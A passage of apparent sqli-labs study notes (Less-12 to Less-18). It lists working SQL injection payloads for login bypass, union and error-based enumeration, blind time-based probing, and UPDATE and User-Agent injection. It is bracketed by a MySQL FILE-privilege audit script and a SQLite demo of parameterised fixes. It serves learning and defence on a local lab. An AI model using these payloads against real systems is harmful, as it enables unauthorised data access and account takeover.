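SAMPLE_SECURE_FILE_PRIV = ""   # empty string: no directory restriction at all

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<account>\S+)", re.I
)


def parse_grant(line):
    """Split one SHOW GRANTS line into (account, scope, set of privilege names)."""
    m = GRANT_RE.match(line.strip())
    if not m:
        raise ValueError("not a GRANT line: %r" % line)
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return m.group("account"), m.group("scope"), privs


def can_touch_files(scope, privs):
    # FILE is a global privilege: it only exists at *.* scope, and ALL PRIVILEGES
    # granted at that scope includes it. A db-level grant never confers FILE.
    return scope == "*.*" and ("FILE" in privs or "ALL PRIVILEGES" in privs)


def audit(grant_lines, secure_file_priv):
    """List the accounts and server settings that make INTO OUTFILE / LOAD_FILE usable."""
    findings = []
    for line in grant_lines:
        account, scope, privs = parse_grant(line)
        if can_touch_files(scope, privs):
            findings.append("%s can use INTO OUTFILE / LOAD_FILE (FILE at *.*)" % account)
    if secure_file_priv is None or secure_file_priv.upper() == "NULL":
        pass  # file import/export disabled server-wide: nothing to report
    elif secure_file_priv == "":
        findings.append("secure_file_priv is empty: file reads and writes allowed in any "
                        "directory the mysqld user can access (including a writable web root)")
    else:
        findings.append("secure_file_priv confines file access to %s; keep the web root "
                        "outside it" % secure_file_priv)
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_GRANTS, SAMPLE_SECURE_FILE_PRIV):
        print(finding)
```

A web application account like the constructed 'webapp' one needs no FILE privilege at all; revoking it and setting secure_file_priv removes the whole outfile path even if the injection itself remains.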
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection - Error Based
localhost/sqli-labs/Less-12/
below are the test scenarios to break the query,
'
"
''
""
')
")
\
below, to fix the query that we broke,
") --(space) OR ") # OR try ") --+
") or 1=1 #
") or 1=1 LIMIT 0,1 #
") or 1=1 LIMIT 1,1 #
") or 1=1 LIMIT 2,1 #
") or 1=1 LIMIT 3,1 #
to find how many columns the developer uses, with the "order by" function as below,
") order by 4 #
") order by 3 #
") order by 2 #
'""") and password=("") LIMIT 0,1'
'"\") and password=("") LIMIT 0,1'
select * from table where username=("$uname") and password=("$passwd") LIMIT 0,1
select col1, col2 from table where username=("$uname") and password=("$passwd") LIMIT 0,1
") union select 1,2 #
") union select database(),version() #
") union select 1,table_name from information_schema.tables where table_schema=database() #
") union select 1,table_name from information_schema.tables where table_schema=database() LIMIT 1,1 #
") union select 1,table_name from information_schema.tables where table_schema=database() LIMIT 2,1 #
") union select 1,table_name from information_schema.tables where table_schema=database() LIMIT 3,1 #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection - Double Query based
localhost/sqli-labs/Less-14/
try to use the combination of strings, numbers and special characters
9834756 --> failed login attempts
admin/admin --> failed login attempts
9849357/admin --> failed login attempts
admin/password --> failed login attempts
' --> didn't break the query
'/' --> didn't break the query
') --> didn't break the query
;)) --> didn't break the query
" --> success, breaks the query
" -- OR " # --> fixing the query
" # --> failed login attempts
" or 1=1 # --> successfully logged-in
from the database backend,
mysql>use security;
mysql>select database();
mysql>select concat((select database()));
mysql>select concat("~",(select database()),"~",floor(rand(0)*2));
mysql>select concat("~",(select database()),"~",floor(rand(0)*2)) from information_schema.tables;
mysql>select (concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables;
mysql>select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c;
select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a
in the front end, i.e. the website login page,
" AND (select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a) #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection BLIND Boolean and Timebased
localhost/sqli-labs/Less-16/
try all the possibilities to break the query,
since it is blind, we assume that we broke the query; we find out what actually broke it while fixing the query by guessing.
' # OR " # OR ') # OR ") # OR ')) # OR ")) #
") or 1=1 # --> fixes the query, meaning ") is used by the developer
") and sleep(10) # --> didn't work
") or sleep(10) # --> it worked, displayed as "waiting for localhost"
the developer's query is like,
select col1, col2 from table where username=("") AND sleep(15) # ") and password=("some data"); --> didn't work
select col1, col2 from table where username=("SOME DATA") AND sleep(15) # ") and password=("some data"); --> it worked
Timebased:
admin") and if(1=1,sleep(10),null) #
admin") and if(database()='security',sleep(10),null) #
Boolean based:
admin") and (select database()='security') #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection in UPDATE Query
localhost/sqli-labs/Less-17/
URL loaded is a password reset page.
from the backend database,
mysql>select * from users where username="admin";
mysql>update users SET password='12345' where username='admin';
assuming the query created by the developer is,
UPDATE users SET password="some variable" where username="admin";
here, trying combinations of values like,
'/' --> didn't break
"/" --> didn't break
' --> didn't break
" --> didn't break
/ --> didn't break
admin/' --> broken
admin/' or 1=1 # --> successfully logged in, meaning the query is fixed
the above query has changed the password for all the users in the users table,
UPDATE users SET password='' or 1=1 # ' where username='admin';
Since it is a password update page, it does not display anything from the database to us, so we use DOUBLE QUERY INJECTION to produce errors and through them enumerate all the information we want.
' AND (select 1 from (select count(*),(concat("~",(select @@datadir),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a) #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Injection in INSERT QUERY
localhost/sqli-labs/Less-18/
INSERT is the SQL statement that adds records to the database.
To enumerate: if we enter admin/admin, it displays the user-agent record. That is the point to fuzz and break the query.
To fuzz the User-Agent field in particular, we need to intercept the request; for that we use the Firefox plugin "Tamper Data" or any intercepting proxy, e.g. Burp Suite, ZAP, etc.
from Tamper Data, changing the User-Agent value as below,
User-Agent: \ --> breaks the query
User-Agent: ' --> breaks the query
User-Agent: ' or '1'='1 --> fixed the query, successfully logged in
This is injection into a parameter value of the INSERT query.
The way to get results here is DOUBLE QUERY INJECTION, as the attacker has no direct output from the database.
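As an added example (not the lab's code or the notes' own), the developer queries quoted in the Less-5, Less-12/14, Less-17 and Less-18 sections are rebuilt in Python on SQLite, which stands in for MySQL so the string-built form and the parameterised fix can be run side by side offline. SQLite has no "#" comment and no database()/version(), so the notes' payloads use "-- " and sqlite_version() here; the tables and rows are constructed.

```python
import sqlite3

# Added example (not from the notes or from sqli-labs): the developer queries
# quoted in the notes rebuilt on SQLite, standing in for MySQL, so the
# string-built and parameterised forms run offline. Rows are constructed.
# SQLite differences: no '#' comment and no database()/version(), so the
# payloads below use '-- ' and sqlite_version() instead.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'pw1'), (2, 'bob', 'pw2');
        CREATE TABLE uagents (id INTEGER PRIMARY KEY, uagent TEXT, username TEXT);
    """)
    return conn

# Less-1/Less-5 shape: select col1,col2,col3 from table where id='$your_input'
def lookup_vulnerable(conn, user_input):
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 0,1" % user_input
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_input):
    # id is numeric by contract: reject anything else, then bind the value so
    # the driver never lets user input reach the SQL grammar.
    try:
        id_value = int(user_input)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1", (id_value,)
    ).fetchall()

# Less-12/Less-14 shape: where username=("$uname") and password=("$passwd") LIMIT 0,1
def login_vulnerable(conn, uname, passwd):
    sql = ("SELECT id, username FROM users WHERE username=('%s') "
           "AND password=('%s') LIMIT 0,1" % (uname, passwd))
    return conn.execute(sql).fetchall()

def login_safe(conn, uname, passwd):
    # Bound parameters; password hashing is out of scope for this example.
    return conn.execute(
        "SELECT id, username FROM users WHERE username=? AND password=? LIMIT 0,1",
        (uname, passwd),
    ).fetchall()

# Less-17 shape: UPDATE users SET password='$new' WHERE username='admin'
def reset_vulnerable(conn, username, new_pw):
    conn.execute("UPDATE users SET password='%s' WHERE username='%s'" % (new_pw, username))
    return conn.execute("SELECT username, password FROM users ORDER BY id").fetchall()

def reset_safe(conn, username, new_pw):
    cur = conn.execute("UPDATE users SET password=? WHERE username=?", (new_pw, username))
    return cur.rowcount  # 1 for a real user, 0 for an unknown one, never "all rows"

# Less-18 shape: the User-Agent header copied into an INSERT
def log_agent_safe(conn, uagent, username):
    conn.execute("INSERT INTO uagents (uagent, username) VALUES (?, ?)", (uagent, username))
    return conn.execute("SELECT uagent FROM uagents ORDER BY id DESC LIMIT 1").fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    union = "23451' union select 1,sqlite_version(),'x' -- "
    print(lookup_vulnerable(db, union))                   # version row leaks past LIMIT 0,1
    print(lookup_safe(db, union))                         # []
    print(login_vulnerable(db, "') or 1=1 -- ", "any"))   # both users, no password needed
    print(login_safe(db, "') or 1=1 -- ", "any"))         # []
    print(reset_vulnerable(db, "admin", "' or 1=1 -- "))  # every password overwritten
    print(log_agent_safe(db, "' or '1'='1", "alice"))     # stored literally
```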